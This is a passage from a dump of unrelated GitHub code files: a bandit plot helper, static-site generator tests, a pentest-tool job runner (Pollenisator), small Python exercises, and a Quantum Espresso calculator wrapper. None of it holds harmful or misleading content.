A\n\n\ndef plot_bandit_dist(bandit):\n \"\"\"\n Plots distribution of rewards for each k in bandit.\n\n Args:\n bandit (list): Contains mean and std / reward for each k.\n \"\"\"\n k = len(bandit)\n num_points = 10000\n data = np.zeros((num_points, k))\n actions = range(k)\n for action in actions:\n mean, std = bandit[action]\n data[:, action] = np.random.normal(mean, std, size=(num_points, ))\n plt.figure(figsize=(7, 5))\n plt.violinplot(data, positions=actions)\n plt.plot(np.mean(data, axis=0), '.r', markersize=10)\n plt.xlabel(\"Action\", fontsize=12)\n plt.xticks(actions)\n plt.legend([r\"$q_*$\"], fontsize=12)\n plt.ylabel(\"Reward distribution\", fontsize=12)\n plt.show()\n","repo_name":"sgalella/kArmedBandit","sub_path":"k_armed_bandit/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42971300483","text":"import pathlib\n\nimport pluggy\nimport pytest\nfrom jinja2 import FileSystemLoader\n\nfrom render_engine.collection import Collection\nfrom render_engine.page import Page\nfrom render_engine.site import Site\n\npm = pluggy.PluginManager(\"fake_test\")\n\n\ndef test_site_defaults():\n \"\"\"\n Tests that a site can be created with default variables.\n Those values are:\n - SITE_TITLE: \"Untitled Site\"\n - SITE_URL: \"http://example.com\"\n \"\"\"\n\n site = Site()\n\n assert site.site_vars[\"SITE_TITLE\"] == \"Untitled Site\"\n assert site.site_vars[\"SITE_URL\"] == \"http://localhost:8000/\"\n\n\ndef test_site_site_vars_orrider_defaults_via_class():\n \"\"\"\n Tests that a site can be created with default variables.\n \"\"\"\n\n site = Site()\n site_vars = {\n \"SITE_TITLE\": \"My Site\",\n \"SITE_URL\": \"https://my-site.com\",\n }\n\n site.site_vars = site_vars\n\n assert site.site_vars[\"SITE_TITLE\"] == \"My Site\"\n assert site.site_vars[\"SITE_URL\"] == \"https://my-site.com\"\n\n\ndef test_site_page_in_route_list(tmp_path):\n tmp_dir = tmp_path / \"content\"\n tmp_dir.mkdir()\n file = tmp_dir / \"test.md\"\n file.write_text(\"test\")\n\n site = Site()\n\n # assert that the route list is empty\n assert len(site.route_list) == 0\n\n class CustomPage(Page):\n test_value = \"test\"\n content_path = file.absolute()\n\n site.page(CustomPage)\n\n assert site.route_list[\"custompage\"].test_value == \"test\"\n\n\ndef test_site_collection_in_route_list():\n \"\"\"Tests that when a collection is added to the route_list it is only the colleciton\"\"\"\n site = Site()\n\n # assert that the route list is empty\n assert len(site.route_list) == 0\n\n class CustomPage1(Page):\n pass\n\n\n class CustomPage2(Page):\n pass\n\n class collection(Collection):\n pages = [CustomPage1(), CustomPage2()]\n\n collection = site.collection(collection)\n\n assert site.route_list[\"collection\"] == collection\n assert len(site.route_list) == 1\n assert 'custompage1' in [getattr(page, page._reference) for page in site.route_list[\"collection\"]]\n\n\ndef test_site_page_with_multiple_routes_has_one_entry_in_routes_list():\n \"\"\"Tests a page with multiple routes only has one entry in the routes list\"\"\"\n site = Site()\n\n class CustomPage(Page):\n test_value = \"test\"\n routes = [\"customroute\", \"customroute2\"]\n\n site.page(CustomPage)\n\n assert len(site.route_list) == 1\n\ndef test_url_for_Page_in_site(tmp_path):\n \"\"\"Tests that url_for a page is added to a template\"\"\"\n test_template = pathlib.Path(tmp_path / \"template.html\")\n test_template.write_text(\"The URL is '{{ 'custompage'|url_for }}'\")\n site = Site()\n site.engine.loader.loaders.insert(0, FileSystemLoader(tmp_path))\n site.output_path = tmp_path\n\n @site.page\n class CustomPage(Page):\n template = test_template.name\n\n site.render()\n custom_page = (tmp_path / \"custompage.html\")\n assert custom_page.exists()\n assert custom_page.read_text() == \"The URL is '/custompage.html'\"\n\n\ndef test_collection_archive_in_route_list(tmp_path):\n \"\"\"Given a collection with an archive, the archive should be in the route list and accessible with url_for\"\"\"\n test_collection_archive_template = pathlib.Path(tmp_path / \"archive_template.html\")\n test_collection_archive_template.write_text(\"This is the collection archive\")\n\n test_collection_template = pathlib.Path(tmp_path / \"collection_archive_item_template.html\")\n test_collection_template.write_text(\"The collection archive route is at '{{ 'customcollection' |url_for }}'\")\n\n site = Site()\n site.engine.loader.loaders.insert(0, FileSystemLoader(tmp_path))\n site.output_path = tmp_path\n\n\n class CustomCollectionPage(Page):\n template = test_collection_template.name\n \n\n @site.collection\n class CustomCollection(Collection):\n archive_template = test_collection_archive_template.name\n has_archive = True\n pages = [CustomCollectionPage()]\n\n\n site.render()\n assert pathlib.Path(tmp_path / \"customcollection.html\").exists()\n assert pathlib.Path(tmp_path / \"customcollectionpage.html\").exists()\n assert pathlib.Path(tmp_path / \"customcollection.html\").read_text() == \"This is the collection archive\"\n assert pathlib.Path(tmp_path / \"customcollectionpage.html\").read_text() == \"The collection archive route is at '/customcollection.html'\"\n\n@pytest.mark.parametrize(\n \"page_number,expected_url\",\n [\n (0, \"custompagescollection.html\"),\n (1, \"custompagescollection1.html\"),\n (2, \"custompagescollection2.html\"),\n ]\n)\ndef test_collection_archive_pages_in_route_list(tmp_path, page_number, expected_url):\n \"\"\"Given a collection with an archive, the archive should be in the route list and accessible with url_for\"\"\"\n test_collection_pages_template = pathlib.Path(tmp_path / f\"collection_archive_item_pages_template{page_number}.html\")\n test_collection_pages_template.write_text(\n f\"The collection archive route is at {{{{ 'custompagescollection' | url_for(page={page_number})}}}}\",\n )\n\n site = Site()\n site.engine.loader.loaders.insert(0, FileSystemLoader(tmp_path))\n site.output_path = tmp_path\n\n\n class CustomCollectionPages1(Page):\n content = 'test'\n class CustomCollectionPages2(Page):\n content = 'test'\n\n @site.collection\n class CustomPagesCollection(Collection):\n archive_template = test_collection_pages_template.name\n has_archive = True\n pages = [CustomCollectionPages1(), CustomCollectionPages2()]\n items_per_page = 1\n\n\n site.render()\n expected_path = pathlib.Path(tmp_path / expected_url)\n assert expected_path.exists()\n assert expected_path.read_text() == f\"The collection archive route is at /{expected_url}\"\n\n\ndef test_url_for_Collection_in_site(tmp_path):\n \"\"\"Tests that url_for a page in a collection is added to a template\"\"\"\n test_template = pathlib.Path(tmp_path / \"custom_template.html\")\n test_template.write_text(\"The URL is '{{ 'customcollection.customcollectionpage' | url_for }}'\")\n \n site = Site()\n site.engine.loader.loaders.insert(0, FileSystemLoader(tmp_path))\n site.output_path = tmp_path\n\n\n class CustomCollectionPage(Page):\n template = test_template.name\n\n @site.collection\n class CustomCollection(Collection):\n template = test_template.name\n pages = [CustomCollectionPage()]\n\n site.render()\n custom_page = (tmp_path / \"customcollectionpage.html\")\n assert custom_page.exists()\n assert custom_page.read_text() == \"The URL is '/customcollectionpage.html'\"\n\n\ndef test_site_output_path(tmp_path):\n \"\"\"Tests site outputs to output_path\"\"\"\n\n output_tmp_dir = tmp_path / \"output\"\n output_tmp_dir.mkdir()\n\n class CustomSite(Site):\n output_path = output_tmp_dir\n\n site = CustomSite()\n @site.page\n class CustomPage(Page):\n content = \"this is a test\"\n\n site.render()\n\n assert (output_tmp_dir / \"custompage.html\").exists()\n\n\ndef test_site_static_renders_in_static_output_path(tmp_path, site):\n \"\"\"\n Tests that a static file is rendered in the static output path.\n \"\"\"\n\n static_tmp_dir = tmp_path / \"static\"\n output_tmp_dir = tmp_path / \"output\"\n output_tmp_dir.mkdir()\n static_tmp_dir.mkdir()\n pathlib.Path(static_tmp_dir / pathlib.Path(\"test.txt\")).write_text(\"test\")\n\n site.output_path = output_tmp_dir\n site.static_paths.add(static_tmp_dir)\n site.render() \n\n assert (output_tmp_dir / \"static\" / \"test.txt\").exists()\n\ndef tests_site_nested_static_paths(tmp_path, site):\n \"\"\"given a static path with nested directories, the output should be the same\"\"\"\n static_tmp_dir = tmp_path / \"static\"\n output_tmp_dir = tmp_path / \"output\"\n output_tmp_dir.mkdir()\n static_tmp_dir.mkdir()\n pathlib.Path(static_tmp_dir / \"nested\").mkdir()\n pathlib.Path(static_tmp_dir / \"nested\" / pathlib.Path(\"test.txt\")).write_text(\"test\")\n pathlib.Path(static_tmp_dir / pathlib.Path(\"test.txt\")).write_text(\"test\")\n\n site.output_path = output_tmp_dir\n site.static_paths.add(static_tmp_dir)\n site.render() \n assert (output_tmp_dir / \"static\" / \"test.txt\").exists()\n assert (output_tmp_dir / \"static\" / \"nested\" / \"test.txt\").exists()\n\ndef tests_site_multiple_static_paths(tmp_path, site):\n \"\"\"given a static path with nested directories, the output should be the same\"\"\"\n static_tmp_dir = tmp_path / \"static\"\n output_tmp_dir = tmp_path / \"output\"\n output_tmp_dir.mkdir()\n static_tmp_dir.mkdir()\n pathlib.Path(static_tmp_dir / pathlib.Path(\"test.txt\")).write_text(\"test\")\n\n second_static_tmp_dir = tmp_path / \"static2\"\n second_static_tmp_dir.mkdir()\n pathlib.Path(second_static_tmp_dir / pathlib.Path(\"test2.txt\")).write_text(\"test\")\n\n site.output_path = output_tmp_dir\n site.static_paths.update([static_tmp_dir, second_static_tmp_dir])\n site.render() \n assert (output_tmp_dir / \"static\" / \"test.txt\").exists()\n assert (output_tmp_dir / \"static2\" / \"test2.txt\").exists()","repo_name":"kjaymiller/render_engine","sub_path":"tests/test_site.py","file_name":"test_site.py","file_ext":"py","file_size_in_byte":9093,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"21"} +{"seq_id":"9932906184","text":"# Project Euler\n# Problem 3\n\n# The prime factors of 13195 are 5, 7, 13 and 29.\n\n# What is the largest prime factor of the number 600851475143 ?\n\n# http://stackoverflow.com/questions/15347174/python-finding-prime-factors\n\nn = 600851475143\ni = 2\n\nwhile i * i < n:\n\twhile n % i == 0:\n\t\tprint(i)\n\t\tn = n / i\n\ti += 1\n\nprint(n)","repo_name":"ysx001/project_euler","sub_path":"python/p_003.py","file_name":"p_003.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28949118653","text":"import numpy as np\nimport glob\n\"\"\"\n最后的数据的维度是:(101,4,w,h) 或者(101,w,h,4)\nw,h由于不同的数据是不同的。\n\n\n\n\"\"\"\nlist_reads = []\nlist_channel = []\nlist_cycle = []\ncycle = 101\nmachinename = 'highDens'\nrunname='R001C001'\n\ntotalpath_A = glob.glob(r\"E:\\code\\python_PK\\callbase\\datasets\\{}\\Result\\Lane01\\deepLearnData\\*\\intensity\\{}_A.npy\".format(machinename,runname))\nmsk_path = r\"E:\\code\\python_PK\\callbase\\datasets\\{}\\Result\\Lane01\\deepLearnData\\{}_mask.npy\".format(machinename,runname)\nmsk = np.load(msk_path).astype(int)\nmsk[msk==-1]=0 #不要没有mapping上的数据\ntotalReadsNum = np.sum(abs(msk)) # only msk ==1: 一个图里有多少个。\nbian =int( np.ceil(totalReadsNum**0.5))\nnumreads = bian**2\n#将totalReadNum宽高比例分成:2:1\ndataArray = np.zeros((101,4,numreads))\nlabel_array = np.zeros((101,numreads)) #label 只是一个通道 0-5。可以说是2维的。\nn = 0\nfor pathA in totalpath_A:\n pathC = pathA.replace(\"A\",\"C\")\n pathG = pathA.replace(\"A\",\"G\")\n pahtT = pathA.replace(\"A\",\"T\")\n listPath = [pathA,pathC,pathG,pahtT]\n pathLabel = pathA.replace(\"intensity\",\"label\").replace(\"A\",\"label\")\n label = np.load(pathLabel).flatten()\n listimg = []\n\n for path in listPath:\n listimg.append(np.load(path).flatten()[np.newaxis,:])\n # listimg has 4 imgs, make it an array\n imgTotal = np.concatenate(listimg) # 4,hxw\n msk = msk.flatten()\n idx = np.where(msk!=0)\n result_ = imgTotal[:,idx].transpose([1,0,2]) # numreads,1,channel .squeeze().transpose() # numreads,channel,size\n result_label = label[idx].transpose()\n\n dataArray[n:n+1,:,:totalReadsNum] = result_ # m: reads in one picture,n:n-th cycle,\n label_array[n,:totalReadsNum] = result_label\n #label_array[m,n] = label[i,j]\n n = n + 1 #\n print(\"totalreads is {},n is {}\".format(totalReadsNum,n))\nnew_dataArray = dataArray.reshape(101,4,bian,bian)\nnew_label_array = label_array.reshape(101,bian,bian)\n\nnp.save(\"pailie/{}_{}.npy\".format(machinename,runname), dataArray)\nnp.save(\"pailie/{}_{}_label.npy\".format(machinename,runname), label_array)\n #np.save(\"21_R001C001_label.npy\",label_array)\n\n #246138 R002C034_A 去除label 为5和未mapping的\n\n\n\n\n","repo_name":"pksolar/sailus","sub_path":"bleeding/method1/pailie.py","file_name":"pailie.py","file_ext":"py","file_size_in_byte":2231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38291305646","text":"\"\"\"worker module. Execute code and store results in database, files in the SFTP server.\n\"\"\"\n\nimport errno\nimport os\nimport ssl\nimport sys\nimport uuid\nimport time\nfrom datetime import datetime, timedelta\nfrom bson.objectid import ObjectId\nfrom multiprocessing import Process\nfrom pollenisatorcli.core.apiclient import APIClient\nfrom pollenisatorcli.core.Models.Interval import Interval\nfrom pollenisatorcli.core.Models.Tool import Tool\nfrom pollenisatorcli.core.Models.Command import Command\nfrom pollenisatorcli.utils.utils import execute, fitNowTime, loadToolsConfig\nfrom pollenisatorcli.utils.utils import print_error, print_formatted_text, print_formatted\n\ndef executeCommand(apiclient, toolId, parser=\"\", local=True, allowAnyCommand=False):\n \"\"\"\n remote task\n Execute the tool with the given toolId on the given calendar name.\n Then execute the plugin corresponding.\n Any unhandled exception will result in a task-failed event in the class.\n\n Args:\n apiclient: the apiclient instance.\n toolId: the mongo Object id corresponding to the tool to execute.\n parser: plugin name to execute. If empty, the plugin specified in tools.d will be fetched.\n local: boolean, set the execution in a local context\n Raises:\n Terminated: if the task gets terminated\n OSError: if the output directory cannot be created (not if it already exists)\n Exception: if an exception unhandled occurs during the bash command execution.\n Exception: if a plugin considered a failure.\n \"\"\"\n # Connect to given calendar\n APIClient.setInstance(apiclient)\n toolModel = Tool.fetchObject({\"_id\":ObjectId(toolId)})\n if toolModel is None:\n return False, \"Tool failed to be created\"\n command_o = toolModel.getCommand()\n msg = \"\"\n ##\n success, comm, fileext, bin_path_server = apiclient.getCommandline(toolId, parser)\n if local:\n tools_infos = loadToolsConfig()\n # Read file to execute for given tool and prepend to final command\n if tools_infos.get(toolModel.name, None) is not None:\n bin_path_local = tools_infos[toolModel.name].get(\"bin\")\n parser = tools_infos[toolModel.name].get(\"plugin\", \"Default.py\")\n success, comm, fileext, bin_path_server = apiclient.getCommandline(toolId, parser)\n if bin_path_server == \"\":\n comm = bin_path_local +\" \"+comm\n else:\n comm = comm.replace(bin_path_server, bin_path_local)\n success = True\n elif allowAnyCommand:\n success, comm, fileext, bin_path_server = apiclient.getCommandline(toolId, parser)\n success = True\n else:\n success = False\n comm = \"This tool is not configured for local usage; Please check Settings\"\n else:\n success, comm, fileext, bin_path_server = apiclient.getCommandline(toolId, parser)\n if not success:\n toolModel.setStatus([\"error\"])\n return False, str(comm)\n \n outputRelDir = toolModel.getOutputDir(apiclient.getCurrentPentest())\n abs_path = os.path.dirname(os.path.abspath(__file__))\n toolFileName = toolModel.name+\"_\" + \\\n str(time.time()) # ext already added in command\n outputDir = os.path.join(abs_path, \"./results\", outputRelDir)\n \n # Create the output directory\n try:\n os.makedirs(outputDir)\n except OSError as exc:\n if exc.errno == errno.EEXIST and os.path.isdir(outputDir):\n pass\n else:\n print_error(str(exc))\n toolModel.setStatus([\"error\"])\n return False, str(exc)\n outputDir = os.path.join(outputDir, toolFileName)\n comm = comm.replace(\"|outputDir|\", outputDir)\n # Get tool's wave time limit searching the wave intervals\n if toolModel.wave == \"Custom commands\" or local:\n timeLimit = None\n else:\n timeLimit = getWaveTimeLimit(toolModel.wave)\n # adjust timeLimit if the command has a lower timeout\n if command_o is not None and timeLimit is not None:\n timeLimit = min(datetime.now()+timedelta(0, int(command_o.get(\"timeout\", 0))), timeLimit)\n ##\n try:\n print_formatted_text(('TASK STARTED:'+toolModel.name))\n if timeLimit is not None:\n print_formatted_text(\"Will timeout at \"+str(timeLimit))\n # Execute the command with a timeout\n returncode, stdout = execute(comm, timeLimit, False)\n if returncode == -1:\n raise Exception(\"Tool Timeout\")\n except Exception as e:\n print_error(str(e))\n toolModel.setStatus([\"error\"])\n return False, str(e)\n # Execute found plugin if there is one\n outputfile = outputDir+fileext\n print_formatted(f\"Uploading {outputfile} tool result ...\")\n msg = apiclient.importToolResult(toolId, parser, outputfile)\n if msg != \"Success\":\n #toolModel.markAsNotDone()\n print_error(str(msg))\n toolModel.setStatus([\"error\"])\n return False, str(msg)\n \n # Delay\n if command_o is not None:\n if float(command_o.get(\"sleep_between\", 0)) > 0.0:\n msg += \" (will sleep for \" + \\\n str(float(command_o.get(\"sleep_between\", 0)))+\")\"\n print_formatted_text(msg)\n time.sleep(float(command_o.get(\"sleep_between\", 0)))\n return True, os.path.normpath(outputfile)\n \ndef getWaveTimeLimit(waveName):\n \"\"\"\n Return the latest time limit in which this tool fits. The tool should timeout after that limit\n\n Returns:\n Return the latest time limit in which this tool fits.\n \"\"\"\n intervals = Interval.fetchObjects({\"wave\": waveName})\n furthestTimeLimit = datetime.now()\n for intervalModel in intervals:\n if fitNowTime(intervalModel.dated, intervalModel.datef):\n endingDate = intervalModel.getEndingDate()\n if endingDate is not None:\n if endingDate > furthestTimeLimit:\n furthestTimeLimit = endingDate\n return furthestTimeLimit\n\n\n","repo_name":"fbarre96/PollenisatorCLI","sub_path":"pollenisatorcli/AutoScanWorker.py","file_name":"AutoScanWorker.py","file_ext":"py","file_size_in_byte":6005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17940229185","text":"\"\"\"\nYou are given a dictionary consisting of word pairs. Every word is a synonym the other word in its pair. All the words in the dictionary are different.\n\nFirst line of the input specifies how many word pairs will follow. After the dictionary there is one more word given. Find a synonym for this word.\n\nHint. To solve the problem quickly, use dictionaries.\n\nFor example, on input\n3\nwater liquid\nfire heat\npython java\nfire\noutput must be\nheat\n\"\"\"\ncount = int(input())\ndiki = {}\nfor i in range(0, count):\n pair = input().split()\n diki[pair[0]] = pair[1]\n\ntarget = input()\nprint(diki[target])\n","repo_name":"piotrpatrzylas/Repl.it","sub_path":"POP1 Part-time/Session 3 Problem 16: Dictionary of synonyms.py","file_name":"Session 3 Problem 16: Dictionary of synonyms.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4249382548","text":"from server.models import Parking\n\ndata={\n '_id' : \"TW-1-1\",\n 'status' : \"empty\", # empty or inuse \n 'license_plate' : \"EAC8668\",\n 'position':['121.519','25.035'],\n 'error':'',\n 'machine' : \"E01\"\n}\nParking.create_parking(data)\n# data={\n# '_id' : \"TW-1-2\",\n# 'status' : \"empty\", # empty or inuse \n# 'license_plate' : \"\",\n# 'position':['121.519','25.033'],\n# 'machine' : \"E02\"\n# }\n# Parking.create_parking(data)\n# # Parking.get_parking({})","repo_name":"Timothychen00/RoadParking-server","sub_path":"test/parking_test.py","file_name":"parking_test.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"35663754085","text":"\nN=int(input())\nYmin=9\nNmax=2\nif N==0 :\n print('F')\nelse:\n for i in range(N):\n cnt, yn = input().split()\n cnt = int(cnt)\n if yn is 'Y':\n if Ymin > cnt: Ymin = cnt\n else:\n if Nmax < cnt: Nmax = cnt\n\n if Nmax < Ymin:\n print(Ymin)\n else:\n print('F')\n","repo_name":"gogumasitda/TIL","sub_path":"algorithm/0227/선생님/배부른돼지.py","file_name":"배부른돼지.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"cy","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"20727424172","text":"import io\nfrom operator import mod\nimport sys\n\n_INPUT = \"\"\"\\\n7 10\n11 12 16 22 27 28 31\n\n\n\"\"\"\nsys.stdin = io.StringIO(_INPUT)\n\n# ---------------------------------\nn, k = map(int, input().split())\naa = list(map(int, input().split()))\n\n# しゃくとり法\nR = [0 for _ in range(n)]\n\nfor a_i, a in enumerate(aa):\n if a_i != 0:\n R[a_i] = R[a_i - 1]\n\n # if R[a_i] == a_i:\n # R[a_i] += 1\n\n tmp_diff = 0\n while R[a_i] + 1 != n:\n tmp_diff = aa[R[a_i] + 1] - a\n if tmp_diff <= k:\n R[a_i] += 1\n else:\n break\n\nans = 0\nfor i, r in enumerate(R):\n ans += r - i\n\nprint(ans)\n","repo_name":"makima333/Atcoder-ganbaru","sub_path":"tessoku/A13.py","file_name":"A13.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4824055494","text":"\n## 描述符类,用于代理类中的属性\nclass Typed:\n def __init__(self,name,except_type):\n self.name = name\n self.except_type = except_type\n\n def __get__(self, instance, owner):\n print('执行了get')\n if instance is None:\n return self\n return instance.__dict__[self.name]\n\n def __set__(self, instance, value):\n print('执行了set')\n if isinstance(value,self.except_type):\n instance.__dict__[self.name] = value\n else:\n raise TypeError('输入值类型错误')\n\n def __delete__(self, instance):\n print('执行了delete')\n\ndef typeassert(**kwargs):\n def wrapper(cls):\n print('装饰器只运行了一次') ## Hip = wrapper(Hip)\n for key,value in kwargs.items():\n setattr(cls,key,Typed(key,value)) ### 给类设置类属性\n print('---',cls.__dict__)\n return cls\n return wrapper\n\n@typeassert(name=str,age=int,salary=float)\nclass Hip():\n def __init__(self,name,age,salary):\n self.name = name\n self.age = age\n self.salary = salary\n\nh = Hip('Mike',18,1235.66)\nprint(h.name)\n# h.name = 2312\nh.name = 'Keiven'\nprint(h.name)\nprint(h.__dict__)\nprint(Hip.__dict__)","repo_name":"huotong1212/mylearnpy","sub_path":"code/day08/类装饰器/testde.py","file_name":"testde.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"31128293034","text":"# Pickling is a process of serializing an object. Serializing means to store the object in the form of binary\n# representation so it can be saved in our main memory. The object could be of any type. It could be a string, tuple,\n# or any other sort of object that Python supports.\n\n\n\n# In this example, we will pickle a dictionary. We will save it to a file and then load again.\n\n\nimport pickle\n\n# Pickling a python object\n\n# cars = [\"Audi\", \"BMW\", \"Maruti Suzuki\", \"Harryti Tuzuki\"]\n# file = \"80 mycar.pkl\"\n# fileobj = open(file, 'wb')\n# pickle.dump(cars, fileobj)\n# fileobj.close()\n\n\n# unpickling\n\nfile = \"80 mycar.pkl\"\nfileobj = open(file, 'rb')\nmycar = pickle.load(fileobj)\nprint(mycar)\nprint(type(mycar))\n\n\n# pickle.loads = ?\n\n\n\n\n","repo_name":"harshitsingh20/PythonNotes-All-Program-","sub_path":"79 Picklingsss.py","file_name":"79 Picklingsss.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"19022975610","text":"from ast import Delete\nimport cellconstructor as CC\nimport cellconstructor.Structure\nimport cellconstructor.Methods\n\nimport subprocess\n\nimport ase, ase.io\nimport ase.calculators.calculator\n\nimport cellconstructor.Settings as Settings\n\nimport cellconstructor.Units\nimport copy\n\nimport scipy, scipy.optimize\n\nimport numpy as np\nimport copy\nimport sys, os\n\n\n\n\nclass Calculator:\n def __init__(self):\n \"\"\"\n CELLCONSTRUCTOR CALCULATOR\n ===========================\n \n This is an alternative to ASE calculators, which often do not work.\n It is explicitely done for cellconstructor and python-sscha\n \n \"\"\"\n\n self.label = \"label\"\n self.directory = None \n self.command = None \n self.results = {}\n self.structure = None \n\n def set_directory(self):\n pass\n\n\n\ndef get_energy_forces(calculator, structure):\n \"\"\"\n Accepts both an ase calculaotr and a calculator of CellConstructor\n \"\"\"\n\n if isinstance(calculator, ase.calculators.calculator.Calculator):\n atm = structure.get_ase_atoms()\n atm.set_calculator(calculator)\n\n energy = atm.get_total_energy()\n\n if isinstance(energy, np.ndarray):\n energy = energy[0]\n\n forces = atm.get_forces()\n return energy, forces\n elif isinstance(calculator, Calculator):\n calculator.calculate(structure)\n return calculator.results[\"energy\"], calculator.results[\"forces\"]\n else:\n raise ValueError(\"Error, unknown calculator type\")\n\ndef get_results(calculator, structure, get_stress = True):\n \"\"\"\n Accepts both an ASE calculator and a Calculator from Cellconstructor\n and computes all the implemented properties (energy, forces and stress tensor).\n \"\"\"\n\n results = {}\n if isinstance(calculator, ase.calculators.calculator.Calculator):\n atm = structure.get_ase_atoms()\n atm.set_calculator(calculator)\n results[\"energy\"] = atm.get_total_energy()\n results[\"forces\"] = atm.get_forces()\n if get_stress:\n results[\"stress\"] = atm.get_stress(voigt = False)\n elif isinstance(calculator, Calculator):\n calculator.calculate(structure)\n results = calculator.results\n if get_stress:\n results[\"stress\"] = CC.Methods.transform_voigt(results[\"stress\"], voigt_to_mat = True)\n else:\n raise ValueError(\"Error, unknown calculator type\")\n\n return results\n\n\nclass FileIOCalculator(Calculator):\n def __init__(self):\n Calculator.__init__(self)\n self.structure = None\n self.output_file = \"PREFIX.pwo\"\n\n def write_input(self, structure):\n if self.directory is None:\n self.directory = os.path.abspath(\".\")\n\n if not os.path.isdir(self.directory):\n os.makedirs(self.directory)\n \n # This is not thread safe, as writing the input override the structure of the shared calculator object\n # Which is then overridden by the read_results\n #self.structure = structure.copy()\n\n def calculate(self, structure):\n self.write_input(structure)\n self.execute()\n self.read_results()\n\n def set_label(self, lbl):\n self.label = lbl\n\n def set_directory(self, directory):\n self.directory = directory\n\n # Produce the directory if it does not exists\n if not os.path.exists(directory):\n os.makedirs(directory)\n \n def execute(self):\n #cmd = \"cd {} && {} && cd ..\".format(self.directory, self.command.replace(\"PREFIX\", self.label))\n cmd = self.command.replace(\"PREFIX\", os.path.join(os.path.abspath(self.directory),self.label))\n outputfname = self.output_file.replace(\"PREFIX\", os.path.join(os.path.abspath(self.directory),self.label))\n\n\n new_env = {k: v for k, v in os.environ.items() if \"MPI\" not in k if \"PMI\" not in k}\n sys.stdout.flush()\n with open(os.path.join(self.directory, outputfname), \"w\") as foutput:\n proc = subprocess.Popen(cmd, shell = True, env = new_env, cwd = self.directory, stdout = foutput)\n sys.stdout.flush()\n errorcode = proc.wait()\n sys.stdout.flush()\n\n \n #os.system(cmd)\n\n def read_results(self):\n pass \n\n\nclass Espresso(FileIOCalculator):\n def __init__(self, input_data = {}, pseudopotentials = {}, masses = None, command = \"pw.x -i PREFIX.pwi\", kpts = (1,1,1), koffset = (0,0,0)):\n \"\"\"\n ESPRESSO CALCULATOR\n ===================\n\n parameters\n ----------\n data_input : dict\n Dictionary of the Quantum Espresso PW input namespace\n pseudopotentials : dict\n Dictionary of the file names of the pseudopotentials\n masses : dict\n Dictionary of the masses (in UMA) of the specified atomic species\n kpts : list\n A list of the k points grid to sample the space.\n If the calculation is given at gamma, use the gamma string.\n Note gamma is incompatible with a koffset\n \"\"\"\n FileIOCalculator.__init__(self)\n\n self.command = command\n self.kpts = kpts\n self.koffset = koffset\n self.input_data = copy.deepcopy(input_data) # Copy to avoid double modification\n self.pseudopotentials = pseudopotentials\n self.output_file = \"PREFIX.pwo\"\n if masses is None:\n masses = {}\n for atm in pseudopotentials:\n masses[atm] = 1.000\n self.masses = masses\n\n assert len(list(self.pseudopotentials)) == len(list(self.masses)), \"Error, pseudopotential and masses must match\"\n\n def copy(self):\n \"\"\"\n Return an identical instance, without inhering the info of the calculation.\n \"\"\"\n new_class = Espresso(self.input_data, self.pseudopotentials, self.masses, self.command, self.kpts, self.koffset)\n return new_class\n\n\n def set_label(self, lbl, override_prefix = True, *args, **kwargs):\n FileIOCalculator.set_label(self, lbl, *args, **kwargs)\n\n # Enforce the override of the prefix\n if override_prefix:\n if \"control\" in self.input_data:\n self.input_data = copy.deepcopy(self.input_data)\n self.input_data[\"control\"].update({\"prefix\" : lbl})\n\n def setup_from_ase(self, ase_calc):\n \"\"\"\n Copy the parameters from the ASE calculator\n \"\"\"\n\n for kwarg in ase_calc.parameters:\n self.__setattr__(kwarg, copy.deepcopy(ase_calc.parameters[kwarg]))\n\n self.set_label(ase_calc.label)\n\n #self.input_data = copy.deepcopy(ase_calc.parameters[\"input_data\"])\n #self.kpts = ase_calc.parameters[\"kpts\"]\n #self.koffset = ase_calc.parameters[\"koffset\"]\n #self.pseudopotentials = copy.deepcopy(ase_calc.parameters[\"pseudopotentials\"])\n\n def write_input(self, structure):\n FileIOCalculator.write_input(self, structure)\n\n typs = np.unique(structure.atoms)\n\n total_input = copy.deepcopy(self.input_data)\n total_input[\"system\"].update({\"nat\" : structure.N_atoms, \"ntyp\" : len(typs), \"ibrav\" : 0})\n #total_input[\"control\"].update({\"outdir\" : self.directory, \"prefix\" : self.label})\n if not \"prefix\" in total_input[\"control\"]:\n total_input[\"control\"].update({\"prefix\" : self.label}) \n\n scf_text = \"\".join(CC.Methods.write_namelist(total_input))\n\n print(\"TOTAL INPUT:\")\n print(total_input)\n scf_text += \"\"\"\nATOMIC_SPECIES\n\"\"\"\n for atm in typs:\n if not atm in self.pseudopotentials:\n raise ValueError(f\"Error, the key {atm} is not a valid atom specified in the pseudopotentials: {list(self.pseudopotentials)}\")\n scf_text += \"{} {} {}\\n\".format(atm, self.masses[atm], self.pseudopotentials[atm])\n \n if isinstance(self.kpts, str):\n if self.kpts.lower() == 'gamma':\n scf_text += '''\nK_POINTS gamma\n'''\n else:\n raise ValueError('Error, kpts msut be either list or gamma, {} not recognized'.format(self.kpts))\n elif len(np.shape(self.kpts)) == 2:\n nkpts, _ = np.shape(self.kpts)\n scf_text += '''\nK_POINTS crystal\n{}\n'''.format(nkpts)\n for i in 